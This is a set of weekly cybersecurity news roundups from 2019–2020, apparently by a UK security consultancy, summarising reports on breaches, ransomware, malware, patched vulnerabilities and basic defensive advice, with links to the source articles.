Seemingly everywhere you turn these days there is some announcement about 5G and the benefits it will bring, like greater speeds, increased efficiencies, and support for up to one million device connections on a private 5G network. All of this leads to more innovations and a significant change in how we do business.
But 5G also creates new opportunities for hackers.
There are five ways in which 5G networks are more susceptible to cyberattacks than their predecessors, according to the 2019 Brookings report, Why 5G requires new approaches to cybersecurity. They are:
The network has moved from centralized, hardware-based switching to distributed, software-defined digital routing. Previous networks had "hardware choke points" where cyber hygiene could be implemented. Not so with 5G.
Higher-level network functions formerly performed by physical appliances are now being virtualized in software, increasing cyber vulnerability.
Even if software vulnerabilities within the network are locked down, the 5G network is now managed by software. That means an attacker that gains control of the software managing the network can also control the network.
The dramatic expansion of bandwidth in 5G creates additional avenues of attack.
Increased vulnerability by attaching tens of billions of hackable smart devices to an IoT network.
Read the full article here: https://www.techrepublic.com/article/5g-and-iot-security-why-cybersecurity-experts-are-sounding-an-alarm/
Virgin Media apologises after data breach affects 900,000 customers
Virgin Media has apologised after a data breach left the personal details of around 900,000 customers unsecured and accessible.
The company said that the breach occurred after one of its marketing databases was “incorrectly configured” which allowed unauthorised access.
It assured those affected by the breach that the database “did not include any passwords or financial details” but said it contained information such as names, home and email addresses, and phone numbers.
Virgin said that access to the database had been shut down immediately following the discovery but by that time the database was accessed “on at least one occasion”.
Read more here: https://www.itv.com/news/2020-03-05/virgin-media-apologises-after-data-breach-affects-900-000-customers/
Do these three things to protect your web security camera from hackers
NCSC issues advice on how to keep connected cameras, baby monitors and other live streaming security tools secure from cyberattacks.
Owners of smart cameras, baby monitors and other Internet of Things products have been urged to help keep their devices safe by following three simple steps to boost cybersecurity – and making it more difficult for hackers to compromise them.
The advice from the UK's National Cyber Security Centre (NCSC) – the cyber arm of the GCHQ intelligence agency – comes as IoT security cameras and other devices are gaining popularity in households and workplaces.
Change the default password
Apply updates regularly
Disable unnecessary alerts
For more refer to the original article here: https://www.zdnet.com/article/do-these-three-things-to-protect-your-web-security-camera-from-hackers/
Cyber Weekly Flash Briefing for 14 February 2020 – Microsoft patches 99 vulns, Nedbank 1.7m customer breach, PC malware spreads via WiFi, Cybercrime losses triple
Cyber Weekly Flash Briefing for 14 February 2020 – Microsoft patches 99 vulns, Nedbank 1.7m customer breach, PC malware spreads via WiFi, Cybercrime losses triple
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Microsoft Patch Tuesday fixes IE zero‑day and 98 other flaws
This month’s Patch Tuesday fell this week and it came with fixes for no fewer than 99 security vulnerabilities in Windows and other Microsoft software.
Twelve flaws have received the highest severity ranking of “critical”, while 5 security holes are listed as publicly known at the time of release.
In fact, one vulnerability ticks both boxes – an actively exploited zero-day in Internet Explorer (IE). Microsoft disclosed this flaw, indexed as CVE-2020-0674, three weeks ago but didn’t roll out a patch until now. Successful exploitation of this remote code execution (RCE) vulnerability enables remote attackers to run code of their choice on the vulnerable system.
Another 16 RCE holes are being plugged as part of this month’s bundle of security patches. This includes two severe vulnerabilities in the Windows Remote Desktop Client, CVE-2020-0681 and CVE-2020-0734, where exploitation is seen as likely by Microsoft.
Updates have been released for various flavours of Windows, as well as for Office, Edge, Exchange Server, SQL Server and a few more products. The number of fixes this month is unusually high; for example, last month’s Patch Tuesday rollout fixed 49 vulnerabilities.
Read more here: https://www.welivesecurity.com/2020/02/12/microsoft-patch-tuesday-fixes-99-vulnerabilities-ie-zero-day/
Nedbank says 1.7 million customers impacted by breach at third-party provider
Nedbank, one of the biggest banks in the South Africa region, has disclosed a security incident yesterday that impacted the personal details of 1.7 million users.
The bank says the breach occurred at Computer Facilities (Pty) Ltd, a South African company the bank was using to send out marketing and promotional campaigns.
In a security notice posted on its website, Nedbank said there was a vulnerability in the third-party provider's systems that allowed an attacker to infiltrate its systems.
The data of 1.7 million past and current customers is believed to have been affected. Details stored on the contractor's systems included things like names, ID numbers, home addresses, phone numbers, and email addresses.
The bank began notifying customers about the breach yesterday
More information here: https://www.zdnet.com/article/nedbank-says-1-7-million-customers-impacted-by-breach-at-third-party-provider/
Why you can’t bank on backups to fight ransomware anymore
Ransomware operators stealing data before they encrypt means backups are not enough.
The belief that no personally identifying information gets breached in ransomware attacks is common among victims of ransomware—and that's partially because ransomware operators had previously avoided claiming they had access to victims' data in order to maintain the "trust" required to extract a payment. Cyber insurance has made paying out an attractive option in cases where there's no need for an organisation to reveal a breach, so the economics had favoured ransomware attackers who provided good "customer service" and gave (usually believable) assurances that no data had been taken off the victims' networks.
Unfortunately, that sort of model is being blown up by the Maze and Sodinokibi (REvil) ransomware rings, which have adopted a model of using stolen data as leverage to ensure customers will make a payment. Even in cases where a victim can relatively quickly recover from a ransomware attack, they still will face demands for payment in order to avoid the publication or sale of information stolen by the attackers before the ransomware was triggered.
Read more here: https://arstechnica.com/information-technology/2020/02/why-you-cant-bank-on-backups-to-fight-ransomware-anymore/
Newly discovered PC malware version spreads through Wi-Fi networks
A new version of a highly sophisticated Trojan that can spread via Wifi networks has been discovered. The Emotet Trojan that also acts as a loader for other malware has found to now take advantage of the wlanAPI interface to spread to all PCs on a network through the Wi-fi. The Trojan was previously known to spread only through spam emails and infected networks.
The ability of this Trojan to brute force its way into networks through Wi-fi from the infected PC has supposedly gone undetected for at least two years. When the malicious software enters into a system, it begins listing and profiling wireless networks using the wlanAPI.dll calls so that it can spread to any networks that are accessible. This is because the wlanAPI.dll calls are used by Native Wi-Fi to manage wireless network profiles and wireless network connections.
Read more here: https://www.neowin.net/news/newly-discovered-pc-malware-version-spreads-through-wi-fi-networks/
Why the ransom is only a fraction of the cost of a ransomware attack
The expense of dealing with a ransomware attack is far in excess of what was previously thought, according to a report published on Tuesday.
Estimate for the total ransom payments demanded in 2019 was $25 billion. But this is only one seventh of the actual cost to the companies affected, which could be as much as $170 billion, according to estimates. Most of these costs arise from downtime and are associated with dealing with the attack, rather than the ransom itself, according to the report.
Read more here: https://decrypt.co/19084/why-ransom-fraction-cost-ransomware-attack
5 Critical Zero-day Vulnerabilities Affected Tens of Millions of Cisco Switches, Routers, IP Phones and Cameras
Researchers discovered 5 critical zero-day vulnerabilities (dubbed CDPwn) in Cisco Discovery Protocol that are used in multiple Cisco products such as Routers, Switches, IP phones, Cameras and more.
Cisco Discovery Protocol is also known as CDP is the Cisco proprietary Layer 2 (Data Link Layer) network protocol and is virtually implemented in Cisco products including switches, routers, IP phones, and cameras to discover the information about the Cisco equipment.
Four of the five vulnerabilities are remote code execution (RCE) vulnerabilities that affected 10 of millions of users, and it allows attackers to completely take over the vulnerable devices without any sort of user interaction.
One vulnerability cause Denial of Service in Cisco FXOS, IOS XR and NX-OS Software Cisco Discovery Protocol implemented target routers, and in turn, completely disrupt target networks.
Read more here: https://gbhackers.com/zero-day-vulnerability-affected-cisco-cdp-devices/
Average tenure of a CISO is just 26 months due to high stress and burnout
Chief Information Security Officers (CISOs, or CSOs) across the industry are reporting high levels of stress.
Many say the heightened stress levels has led to mental and physical health issues, relationship problems, medication and alcohol abuse, and in some cases, an eventual burnout, resulting in an average 26-month tenure before CISOs find new employment.
The numbers, reported by Nominet, represent a growing issue that's been commonly acknowledged, but mostly ignored across the information security (infosec) community, but one that is slowly starting to rear its ugly head as once-ignored infosec roles are becoming more prominent inside today's companies.
Today, many companies are adopting CISO roles. The constant threat of hacks, ransomware, phishing, and online scams makes establishing a cyber-security department in any company a unavoidable decision.
However, most companies are not ready to embed CISOs into their company culture and day-to-day operations.
Today, CISO jobs come with low budgets, long working hours, a lack of power on executive boards, a diminishing pool of trained professionals they can hire, but also a constant stress of not having done enough to secure the company's infrastructure against cyber-attacks, continuous pressure due to newly arising threats, and little thanks for the good work done, but all the blame if everything goes wrong.
Across the years, many CISOs have often pointed out the problems with their jobs and the stress and damage they inflict. However, there has been no conclusive study to support broad assertations.
Read the full article here: https://www.zdnet.com/article/average-tenure-of-a-ciso-is-just-26-months-due-to-high-stress-and-burnout/
Ex-GCHQ spy chief says scammers are running rings around Google
Bogus investment and savings adverts banned by Google are reappearing at the top of its search results because con artists can easily circumnavigate the internet giant’s systems, according to a former spy.
Scammers are able to dupe the world’s most powerful search engine simply by making slight alterations to the names of their fake firms.
For example, one website, info.bond-finder.co.uk, appeared at the top of Google’s search results when consumers typed in “best fixed rate Isa”. But the website had the same contact details as another site, bonds-finder.com, which was identified by the financial regulator, the Financial Conduct Authority (FCA), as a likely scam in January and deleted by Google.
Google launched an investigation after it was alerted to the matter by this newspaper and, after a connection between the two sites was confirmed, the advert was removed.
The company has been in talks with the FCA for almost a year about how to solve the problem of unregulated investment firms and fraudsters duping consumers by paying to appear first in search results through Google’s Ads service.
Read more here: https://www.telegraph.co.uk/money/consumer-affairs/ex-gchq-spy-chief-says-scammers-running-rings-around-google/
FBI: Cybercrime losses tripled over the last 5 years
In 2019, the United States’ Federal Bureau of Investigation (FBI) received more than 467,000 cybercrime complaints that caused an estimated US$3.5 billion in losses, according to the Bureau’s annual 2019 Internet Crime Report (IC3). Last year saw both the highest number of complaints and the highest dollar losses on record; in 2015, for example, annual losses totaled ‘only’ US$1.1 billion.
Business Email Compromise (BEC) fraud remains the costliest type of fraud on the list, accounting for more than half of the total losses and costing businesses almost US$1.8 billion. These schemes are constantly evolving, too. Back in 2013, scammers would typically hack or spoof the email account of a CEO or CFO to request a fraudulent transfer of funds to accounts under their control. Over the years the tactics have evolved to also include compromising personal or vendor emails as well as spoofing lawyers’ email accounts.
Payroll diversion emerged as a popular form of BEC fraud last year. Scammers target HR and payroll departments by acting as employees who want to update their direct deposit information for the current payment period. The updated information then usually directs the funds to a pre-paid card account.
Elder fraud is also an increasingly pressing issue. With 68,013 victims, this type of fraud had the highest number of victims; under-twenties claimed “just” 10,724 victims. The number of victims may not reflect the true extent of the problem since providing the age range is voluntary.
Week in review 29 December 2019 Round up of the most significant open source stories of the last week
Black Arrow Cyber Security review of top open source news articles for week ending 29 December 2019: 10 biggest hacks of the decade, biggest malware threats, MI6 floorplans lost, Citrix vulnerabilities, popular chat app actually spying tool, jobs in infosec
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Consulting would like to wish everyone a happy, prosperous, and cyber safe, 2020
A bit of a quiet week as one would expect with Christmas festivities. As it’s the end of the year, and indeed the end of a decade, there are lots of round ups of the last year and the last decade, and a lot of predictions for what 2020 will hold (we suspect more bad stuff, more ransomware and more devious and nasty strains of ransomware at that, and more breaches) and in that vein on to our first story:
The 10 biggest data hacks of the decade
This article comes from CNBC in the US and whilst the content is US centric a lot of people on this side of the Atlantic would have been caught up in a lot of these breaches too.
Since 2010, data breaches have exposed over 38 billion records, and there have been at least 40,650 data hacks in this time. And while many were smaller data breaches, there were a few mega hacks that will likely remain records for years to come.
Amongst the biggest breaches are:
UnderArmour (MyFitnessPal), from March 2018 with 143.6 million records hacked
Equifax from September 2017 with 147 million records hacked
Marriott (Starwood) from November 2018 with 383 million records hacked
Veeam from September 2018 with 445 million records hacked
Yahoo! from September and December 2016 with up to 3 billion records hacked
There have been many other breaches affecting other companies, such as WhatsApp and Fortnite, who have reported security flaws in the past year that could have exposed millions of customers’ data, but the extent of the accessed data has not yet been fully ascertained.
Read the full article here: https://www.cnbc.com/2019/12/23/the-10-biggest-data-hacks-of-the-decade.html
Live visualisations of the World’s Biggest Data Breaches and Hacks can be found anytime by clicking here or on the image below: https://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Biggest Malware Threats of 2019
2019 was another banner year for bots, trojans, RATS and ransomware. Let’s take a look back.
One out of five computer users were subject to at least one malware-class web attack in 2019. This past year cities such as New Orleans were under ransomware siege by the likes of malware Ryuk. Zero-day vulnerabilities were also in no short supply with targets such as Google Chrome and Operation WizardOpium.
Threatpost have taken a look back over their coverage from the last 12 months.
Remote desktop protocol vulnerabilities BlueKeep, and then DejaBlue, allowed unauthenticated, remote attackers to exploit and take complete control of targeted endpoints. The fear of BlueKeep and its wormable potential to mimic the WannaCry forced Microsoft’s hand to patch systems as old as Windows XP and Windows 2000.
This past year had its fair share of zero-day vulnerabilities. One of the most prominent of the zero days was Urgent/11, impacting 11 remote code execution vulnerabilities in the real-time OS VxWorks. Because of VxWorks use in so many critical infrastructure devices, the U.S. Food and Drug Administration took the unusual step and released a warning, urging admins to patch.
We were warned last year when mitigating against Meltdown and Spectre that we would face more side-channel related CPU flaws in the future. And this year we did, with variants ranging from ZombieLoad to Bounds Check Bypass Store, Netspectre and NetCAT. For 2020? Expect even more variants, say experts.
2019 was the year ransomware criminals turned their attention away from consumers and started focusing on big targets such as hospitals, municipalities and schools. There was the Ryuk attack against New Orleans, Maze ransomware behind Pensacola attack and rash of attacks against hospitals that resulted in some care facilities turning patients away.
Botnets continued to be a key tool in cyberattacks in 2019. This past year saw the return of the notorious Emotet botnet. Crooks behind Trickbot partnered with bank trojan cybercriminals from IcedID and Ursif. Lastly, Echobot, an IoT botnet, casts a wider net in 2019 with raft of exploit additions.
Perhaps the highest-profile cryptominer attack occurred in May when researchers found 50,000 servers were infected for over four months as part of a high-profile cryptojacking campaign featuring the malware Nansh0u. The past year also saw a new XMRig-based cryptominer called Norman emerge, which stood apart because of its clever ability to go undetected.
Even though the target is smaller, mobile devices offer criminals top-tier data. Not only are APTs shifting focus on mobile, but so are garden-variety crooks. Take, for example, the Anubis mobile banking trojan that only goes into action after it senses the targeted device is in motion. Then there was the Instagram-initiated campaign using the Gustuff Android mobile banking trojan that rolled out in October.
Google’s Project Zero, in August, found 14 iOS vulnerabilities in the wild since September 2016. According to Google's Threat Analysis Group (TAG) the flaws could allow malware easily steal messages, photos and GPS coordinates. These flaws highlighted five exploit chains in a watering hole attack that has lasted years. Google said malware payload used in the attack is a custom job, built for monitoring.
In May, researchers uncovered a unique Linux-based malware dubbed HiddenWasp that targeted systems to remotely control them. The malware is believed to be used as part of a second-stage attack against already-compromised systems and is composed of a rootkit, trojan and deployment script.
Discussing malware without touching on business email compromise-based attacks would be like talking about the New England Patriots without mentioning Tom Brady. Fake Greta Thunberg emails used to lure victims to download Emotet malware. Of course the Swedish climate-change activist was just one of the lures that in 2018 contributed to 351,000 scams with losses exceeding $2.7 billion.
Read the original article here: https://threatpost.com/biggest-malware-threats-of-2019/151423/
7 types of virus – a short glossary of contemporary cyberbadness
Technically, this article is about malware in general, not about viruses in particular.
These days, however, the crooks don’t really need to program auto-spreading into their malware – thanks to always-on internet connectivity, the “spreading” part is easier than ever, so that’s one attention-grabbing step the crooks no longer need to use.
But the word virus has remained as a synonym for malware in general, and that’s how we’re using the word here.
So, for the record, here are seven categories of malware that give you a fair idea of the breadth and the depth of the risk that malware can pose to your organisation.
Read the full article here: https://nakedsecurity.sophos.com/2019/12/28/7-types-of-virus-a-short-glossary-of-contemporary-cyberbadness/
MI6 floor plans lost by building contractor
Floor plans of MI6's central London headquarters were lost by building contractors during a refurbishment.
The documents, most of which were recovered inside the building, held sensitive information on the layout, including entry and exit points.
Balfour Beatty, the company working on the refurbishment at the headquarters in Vauxhall, is reportedly no longer working on the project.
The Foreign Office said it did not comment on intelligence matters.
The documents, which went missing a few weeks ago, were produced and owned by Balfour Beatty and designed to be used for the refurbishment.
The contractor kept the plans on the site at Vauxhall Cross in a secure location.
BBC security correspondent Gordon Corera said the missing plans were not classified or intelligence documents, but the pages did hold sensitive details.
Most, but not all, of the documents were recovered inside the building after it was noticed they were missing, he said.
Balfour Beatty said it could not comment because of sensitivities.
The incident, first reported by the Sun newspaper, is reportedly a result of carelessness, rather than any hostile activity.
Read the original article here: https://www.bbc.co.uk/news/uk-50927854
Citrix vulnerability allowed criminals to hack 80,000 companies
Researchers have found a vulnerability in popular enterprise software offerings from Citrix which puts tens of thousands of companies at risk of cyber attack.
A security researcher uncovered a critical vulnerability in Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway), which allows direct access to a company network from the internet.
According to a report on the flaw, around 80,000 companies in 158 countries around the world could be at risk. Most companies are located in the US, with the UK, Germany, the Netherlands and Australia sharing a significant portion.
Read the full article here: http://www.itproportal.com/news/citrix-vulnerability-allows-criminals-to-hack-80000-companies
Popular chat app ToTok is actually a spying tool of UAE government – report
A chat app that quickly became popular in the United Arab Emirates for communicating with friends and family is actually a spying tool used by the government to track its users, according to a New York Times report.
The government uses ToTok to track conversations, locations, images and other data of those who install the app on their phones, the Times reported, citing US officials familiar with a classified intelligence assessment and the newspaper’s own investigation.
The Emirates has long blocked Apple’s FaceTime, Facebook’s WhatsApp and other calling apps. Emirati media has been playing up ToTok as an alternative for expatriates living in the country to call home to their loved ones for free.
The Times says ToTok is a few months old and has been downloaded millions of times, with most of its users in the Emirates, a US-allied federation of seven sheikhdoms on the Arabian peninsula. Government surveillance in the Emirates is prolific, and the Emirates long has been suspected of using so-called “zero day” exploits to target human rights activists and others. Zero days exploits can be expensive to obtain on the black market because they represent software vulnerabilities for which fixes have yet to be developed.
The Times described ToTok as a way to give the government free access to personal information, as millions of users are willingly downloading and installing the app on their phones and unknowingly giving permission to enable features.
As with many apps, ToTok requests location information, purportedly to provide accurate weather forecasts, according to the Times. It also requests access to a phone’s contacts, supposedly to help users connect with friends. The app also has access to microphones, cameras, calendar and other data.
Read the full article here: https://www.theguardian.com/world/2019/dec/23/totok-popular-chat-app-spying-tool-uae-government
Jobs in Information Security (InfoSec)
For anyone considering a career in cyber or information security (infosec) there is a useful article detailing different roles and different potential areas of work in this field.
We also run a free mentoring program for anyone either looking to move into cyber security or currently in a cyber security role wanting to progress their careers. Contact us for more information.
Read the article here: https://medium.com/bugbountywriteup/jobs-in-information-security-infosec-93a5efc12ca2
Week in review 08 December 2019: 5,183 breaches in first nine months of 2019, 44 million Microsoft customers found using compromised passwords, US charges Russians over hacking attacks
Week in review 08 December 2019: 5,183 breaches in first nine months of 2019, 44 million Microsoft customers found using compromised passwords, US charges Russians over hacking attacks, VPN vulnerabilities, ransomware attacks on network storage devices, Europol take down counterfeit websites, reward offered for Russian hackers largest yet
Week in review 08 December 2019
Round up of the most significant open source stories of the last week
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
5,183 breaches in first nine months of 2019 exposed 7.9b data records
As many as 7.9 billion data records were leaked, stolen or exposed as a result of 5,183 data breaches that took place in the first nine months of 2019, making it the worst year ever for data breaches.
This alarming statistic was revealed by security firm Risk Based Security which observed that based on recent trends, the number of breached data records could touch 8.5 billion by the end of the year.
The firm also noted that the total number of data breaches worldwide rose by 33.3 percent compared to the mid-year of 2018 and the number of records breached also rose by 112 percent. As many as 3.1 million data records were breached as a result of six data breach incidents that took place between 1 July and 30 September.
The majority of data records were exposed or leaked as a result of accidental exposure of data on the internet by organisations. The fact that hackers are quite willing to take advantage of such data exposure has also led to a rise in the number of breached records.
44 million Microsoft customers found using compromised passwords
Microsoft's identity threat researchers have revealed that 44 million of its users are still using passwords that have previously been compromised in past data breaches.
The 44 million weak accounts comprised both Microsoft Services Accounts (regular users) and Azure AD accounts too, suggesting businesses are not adopting proper password hygiene.
A total of three billion user credentials were checked in a database populated from numerous sources including law enforcement and public databases.
Using the data set of three billion credentials, Microsoft was able to identify the number of users who were reusing credentials across multiple online services.
Microsoft forced a password reset for all of those users who were found to have leaked credentials during the scan which took place between January and March 2019.
Evil Corp: US charges Russians over hacking attacks
US authorities have filed charges against two Russian nationals alleged to be running a global cyber crime organisation named Evil Corp.
An indictment named Maksim Yakubets and Igor Turashev - who remain at large - as figures in a group which used malware to steal millions of dollars in more than 40 countries.
Those affected by the hacks include schools and religious organisations. It is also alleged that Mr Yakubets worked for Russian intelligence.
The attacks are said to be amongst the worst computer hacking and bank fraud schemes of the past decade. The $5m reward being offered for information leading to their arrest and prosecution is the largest yet for catching cyber criminals.
Thursday's indictment came after a multi-year investigation by the US and British law enforcement agencies.
Authorities allege that the group stole at least $100m (£76m) using Bugat malware - known as Dridex.
The malware was spread through so-called "phishing" campaigns, which encouraged victims to click on malicious links sent by email from supposedly trusted entities.
Once a computer was infected, the group stole personal banking information which was used to transfer funds.
A network of money launderers - targeted by the NCA and Britain's Metropolitan Police - were then utilised to funnel the criminal proceeds to members of Evil Corp. Eight members of this network have been sentenced to a total of over 40 years in prison.
New ransomware attacks target your NAS devices, backup storage
New ransomware that targets Network Attached Storage devices and other backup devices has surged in recent months with many users unprepared for the increased level of threat.
As with all ransomware paying the ransom is no guarantee of getting data back and should only ever be an absolute last resort.
With networked and backup storage devices falling victim to ransomware infections that emphasises the need to ensure firms have offline copies of backups. Backups that are that are disconnected from systems cannot themselves be corrupted or fall victim to ransomware and would therefore be a firm’s best bet in being able to recover from such an attack.
https://www.zdnet.com/article/new-ransomware-attack-targets-your-nas-devices-backup-storage/
New vulnerability lets attackers sniff or hijack VPN connections
Academics have disclosed this week a security flaw impacting Linux, Android, macOS, and other Unix-based operating systems that allows an attacker to sniff, hijack, and tamper with VPN-tunneled connections. OpenVPN, WireGuard, and IKEv2/IPSec VPNs are all vulnerable to attacks.
The vulnerability -- tracked as CVE-2019-14899 -- resides in the networking stacks of multiple Unix-based operating systems, and more specifically, in how the operating systems reply to unexpected network packet probes.
According to the research team, attackers can use this vulnerability to probe devices and discover various details about the user's VPN connection status.
Whilst this vulnerability affects Linux, Android, Mac and other Unix-based operating systems this vulnerability is not currently believed to affect Windows based systems.
https://www.zdnet.com/article/new-vulnerability-lets-attackers-sniff-or-hijack-vpn-connections/
Newly discovered Mac malware uses “fileless” technique to remain stealthy
Hackers believed to be working for the North Korean government have upped their game with a recently discovered Mac trojan that uses in-memory execution to remain stealthy.
In-memory execution, also known as fileless infection, never writes anything to a computer hard drive. Instead, it loads malicious code directly into memory and executes it from there. The technique is an effective way to evade antivirus protection because there’s no file to be analyzed or flagged as suspicious.
In-memory infections were once the sole province of state-sponsored attackers. By 2017, more advanced financially motivated hackers had adopted the technique. It has become increasingly common since then.
Europol seizes more than 30,000 counterfeit sites on Cyber Monday
Europol has taken down more than 30,000 different web domains which allowed cyber criminals to sell counterfeit and pirated items online.
The joint operation between 18 member states and the US National Intellectual Property Rights Coordination Centre, with help Eurojust and INTERPOL, included the seizure of articles such as fake medicines, pirated movies, music, software and counterfeit electronics.
In addition, officials identified and froze more than €150 000 (£128,000) in several bank accounts and online payment platforms.
As a result of the coordinated operation, codenamed IOS X (In Our Sites), three arrests have been made and 26,000 "luxury products" have been seized along with the swathe of illicit websites.
The IOS campaign launched in 2014, one that Europol has gained in strength year-on-year, and aims to "make the internet a safer place for consumers by recruiting more countries and private sector partners to participate in the operation and providing referrals".
Week in review 06 October 2019: top 10 cyber myths, security breaches inevitable, employee negligence contribute to data breaches, UK local authorities hit with hundreds of cyberattacks every hour
Week in review 06 October 2019: top 10 cyber myths, security breaches inevitable, employee negligence contribute to data breaches, UK local authorities hit with hundreds of cyberattacks every hour
Round up of the most significant open source stories of the last week
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Top 10 Cyber Security Myths
SecurityBoulevard.com have a list of the top 10 cyber security myths that criminals love, including the Number 1 ‘This can’t happen to me’ and a few other prime examples that we do hear in conversation quite often.
Read the full list here: https://securityboulevard.com/2019/10/10-cybersecurity-myths-that-criminals-love/
A security breach is inevitable, IT leaders warned
No matter how much IT security tech and training is in place, sophisticated, targeted attacks are going to breach company defences, Carbon Black warns
A survey by security vendor Carbon Black, as part of their Global threat series study, reported that 84% of UK organisations participating in the study said they have suffered one or more breaches in the past 12 months due to external cyber attacks.
The survey reported that the average number of breaches in affected organisations was 2.89, a reduction from the 3.67 seen in the January 2019 report, with more than half (51.5%) of respondents saying they had been breached only once.
Carbon Black said the number of businesses identifying just a single breach has grown from the previous research, where only 15% had suffered only a single breach. This may indicate that businesses are responding more robustly to breach incidents to ensure that frequency is reduced.
At the other end of the scale, 5.5% of the businesses surveyed admitted they had been breached 10 or more times, and 3% said they didn’t know how many times they had been breached.
The study found that among the IT leaders who took part in the research, 84% reported an increase in cyber attacks in the past 12 months, with nine in 10 saying the attacks they face are becoming more sophisticated. This compares with 87% in the previous report and 82% in the summer of 2018.
https://www.computerweekly.com/news/252471594/A-security-breach-is-inevitable-IT-leaders-warned
Employee negligence can be a leading contributor to data breaches
Two thirds (68%) of businesses reported their organisation has experienced at least one data breach in the past 12 months, and nearly three in four (69%) of those data breaches involved the loss or theft of paper documents or electronic devices containing sensitive information, according to a report conducted by the Ponemon Institute.
https://www.helpnetsecurity.com/2019/10/01/workplace-data-breaches-risk/
UK local authorities hit with hundreds of cyberattacks every hour
Councils across the UK have suffered 263 million attacks in the first six months of the year - equivalent to 800 attacks an hour, or 13 attacks every minute. This is according to a new report by Gallagher, based on a Freedom of Information (FoI) request made towards the councils, with 203 of them answering, and another 204 councils who did not respond so the actual number of attacks could more than double the above, exceeding 500 million in the first half of the year. This gives an idea of the sheer scale and number of attacks going on all the time against all organisations.
https://www.itproportal.com/news/uk-local-authorities-hit-with-hundreds-of-cyberattacks-every-hour/
Microsoft: Any form of MFA takes users out of reach of most attacks
There have been several reports in the media regarding SIM hijacking attacks and the ease with which these types of attacks are being perpetrated, and these reports have raised some doubts or concerns about the security of multi-factor authentication.
This article does a good job of explaining how not all MFA solutions are created equally but the overarching message is that any MFA implementation, anything beyond just a username and password, significantly increases the amount of work for an attacker and as a result accounts with MFA represent less than 0.1% of all attacks.
FBI Stance on Whether Firms Should Pay Ransomware
The FBI in the US came out with hard hitting advice telling firms not to pay ransoms, but to inform the FBI in the event that a firm in the US did decide to pay a ransom.
They then softened their stance with an updated version of their guidance including a section discussing the option of paying the hackers to get data decrypted.
https://www.theregister.co.uk/2019/10/03/fbi_softens_stance_on_ransomware/
Best practice around ransomware is always to ensure you have sufficient backups, both online and offline, such that you can restore your data in the event you get hit with ransomware. Firms need to ensure they have tested recovering their data to make sure they could recover if they needed to. It is too late when trying to recover for real to discover the backup doesn’t work or the wrong directory was being backed up.
Do not rely on cloud storage as being sufficient backup as often any ransomware attack will synchronise with files stored in the cloud before the infection is detected.
More Attacks Seen Using ‘Island Hopping’ (using targets with less security to leverage attacks against targets with more security)
Recent attacks, especially recent attacks against the aerospace and defence industries, have seen an increase in ‘island hopping’, where a bigger group or better defended target is attacked indirectly, through its network of weaker, less defended partner companies. These attacks are carried out in a more ‘horizontal' way rather than the more traditional 'vertical' methods.
https://www.zdnet.com/article/this-new-hacking-group-is-using-island-hopping-to-target-victims/
In addition to the recent aerospace attacks island hopping is also becoming more frequently used to attack financial services.
https://www.itpro.co.uk/security/33946/50-of-cyber-attacks-now-use-island-hopping
Half a million British Airways customers have been given the go-ahead to sue the airline over its cybersecurity breach last summer
On Friday a High Court judge granted a group litigation order, paving the way for a mass legal action enabling some 500,000 people affected by a series of breaches between April and September last year.
Cybersecurity breaches to increase nearly 70% in next 5 years
New analysis from Juniper Research has found that the cost of data breaches will rise from $3 trillion each year to over $5 trillion in 2024, an average annual growth of 11%.
This will primarily be driven by increasing fines for data breaches as regulation tightens, as well as a greater proportion of business lost as enterprises become more dependent on the digital realm.
The new research in The Future of Cybercrime & Security: Threat Analysis, Impact Assessment & Mitigation Strategies 2019-2024 whitepaper noted that while the cost per breach will steadily rise in the future, the levels of data disclosed will make headlines but not impact breach costs directly, as most fines and lost business are not directly related to breach sizes.
Sophisticated tools provide false sense of cyber-security: Survey
Are you confident that your firm is cyber-threat-proof? A Forrester survey among over 250 senior security decision-makers in North America and Europe found that most of them are confident in their firms’ security measures. However, threats to cyber-security remain strong, said the research.
"The abundance of technology investments gives firms a false sense of confidence in their security posture. Their challenges reveal a different story," said the report.
Security executives currently employ a variety of tools and technologies to identify risks and test the effectiveness of their security controls. As a result, they are left with point-in-time assessments that require them to cobble together data from disparate systems to truly understand the organisation’s security posture. This approach is reactive, labour-intensive, and insufficient in scale, explained the report.
Fileless Malware on the Rise
According to reports analysing the state of the threat landscape, fileless malware incidents are up to some 265% in the first half of 2019 when compared to the same period in 2018. Fileless malware sometimes has been referred to as a zero-footprint attack or non-malware attack. However, fileless malware may be the best name for the attack method, as the attack is not dependent on end users downloading and running malware via compromised files. Rather, fileless malware executes malicious scripts by piggybacking on legitimate software packages. More often than not, the malware resides in the computer’s random access memory (RAM), not installed on the hard drive.
https://securityboulevard.com/2019/10/fileless-malware-on-the-rise/